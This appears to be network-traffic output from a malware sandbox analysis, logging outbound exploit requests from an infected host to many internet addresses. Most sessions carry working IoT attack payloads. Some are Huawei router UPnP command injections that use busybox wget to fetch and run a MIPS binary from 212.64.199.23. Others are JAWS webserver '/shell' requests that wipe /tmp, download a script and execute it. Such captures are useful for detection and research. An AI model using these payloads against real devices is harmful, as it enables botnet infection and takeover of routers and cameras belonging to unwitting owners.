                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          13192.168.2.153813841.89.103.10037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.778990984 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          14192.168.2.1543928197.0.255.11137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.782399893 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.1536264156.52.86.1837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.785212994 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          16192.168.2.1556890156.221.146.3637215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.789231062 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          17192.168.2.1555456177.82.8.4980
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.916117907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.154059480.99.95.15080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.917824984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.154822695.13.149.11480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.919598103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.1536720181.156.61.2080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.921240091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.1547426173.206.97.19080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.923331022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          22192.168.2.155549212.97.179.16280
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.925091982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.1545246181.72.225.680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.927115917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.155232884.59.111.13580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.929217100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.153389275.202.255.13680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.931071043 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.1534258139.62.254.10780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.932893038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.1549594115.185.195.25180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.934494019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.1546086104.108.17.7180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.936289072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.154845259.197.123.19180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.937884092 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.1540282122.230.149.11480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.939801931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.1541596204.180.52.5580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.941585064 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.1556634148.124.95.17480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.943336010 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.1553656116.7.76.2380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.945097923 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.155882019.144.149.11380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.946824074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.1537250171.125.195.17480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.948606014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.153827619.122.225.9180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.950176001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.1532782200.162.125.4980
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.336977959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.1539240197.74.8.4937215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.369040966 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.1558508106.129.170.23080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.401195049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.1552314150.158.10.5180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.405183077 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.1552870156.118.10.7737215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.433588028 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
